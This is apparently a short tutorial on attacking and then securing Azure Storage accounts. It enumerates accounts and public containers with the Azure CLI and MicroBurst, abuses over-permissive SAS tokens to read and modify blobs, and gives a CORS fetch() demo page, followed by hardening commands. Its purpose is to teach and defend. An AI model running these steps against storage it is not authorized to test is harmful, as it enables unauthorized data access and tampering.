Attacking Azure Storage Accounts

In this step, we'll use various techniques to enumerate Azure Storage accounts. 1. Using Azure CLI to list storage accounts: ```bash az storage account list --query "[].{Name:name, ResourceGroup:resourceGroup}" -o table ``` 2. Enumerate public blob containers: ```bash az storage container list --account-name <storage-account-name> --auth-mode login ``` 3. Use tools like MicroBurst to discover public blob containers: ```powershell Import-Module MicroBurst.psm1 Invoke-EnumerateAzureBlobs -Base <storage-account-name> ``` Analyze the output to identify any publicly accessible storage accounts or containers.

Now that we've identified potentially vulnerable storage accounts, let's exploit some common misconfigurations. 1. Accessing public blob containers: ```bash az storage blob list --account-name <storage-account-name> --container-name <container-name> --auth-mode login ``` 2. Exploiting overly permissive Shared Access Signatures (SAS): - Identify a SAS token with excessive permissions - Use the SAS token to access and modify data: ```bash az storage blob download --account-name <storage-account-name> --container-name <container-name> --name <blob-name> --sas-token "<sas-token>" ``` 3. Leveraging CORS misconfigurations: - Identify storage accounts with overly permissive CORS settings - Create a simple web page to demonstrate cross-origin access to the storage account ```html <!DOCTYPE html> <html> <body> <script> fetch('https://<storage-account-name>.blob.core.windows.net/<container-name>/<blob-name>', { method: 'GET', mode: 'cors' }) .then(response => response.text()) .then(data => console.log(data)) .catch(error => console.error('Error:', error)); </script> </body> </html> ``` Test the web page to demonstrate successful cross-origin access to the storage account.

To secure Azure Storage accounts, implement the following best practices: 1. Enable Azure Defender for Storage: ```bash az security pricing create -n StorageAccounts --tier 'Standard' ``` 2. Configure network security: ```bash az storage account update --resource-group <resource-group> --name <storage-account-name> --default-action Deny --bypass AzureServices ``` 3. Enable secure transfer (HTTPS): ```bash az storage account update --resource-group <resource-group> --name <storage-account-name> --https-only true ``` 4. Use Azure Key Vault to manage storage account keys: ```bash az keyvault create --name <keyvault-name> --resource-group <resource-group> az keyvault secret set --vault-name <keyvault-name> --name <secret-name> --value <storage-account-key> ``` 5. Implement least privilege access control: - Use Azure AD for authentication - Assign appropriate RBAC roles - Use SAS tokens with limited scope and expiration 6. Enable soft delete and versioning for blob data: ```bash az storage account blob-service-properties update --resource-group <resource-group> --account-name <storage-account-name> --enable-delete-retention true --delete-retention-days 7 az storage account blob-service-properties update --resource-group <resource-group> --account-name <storage-account-name> --enable-versioning true ``` By implementing these best practices, you can significantly improve the security of your Azure Storage accounts and reduce the risk of unauthorized access or data breaches.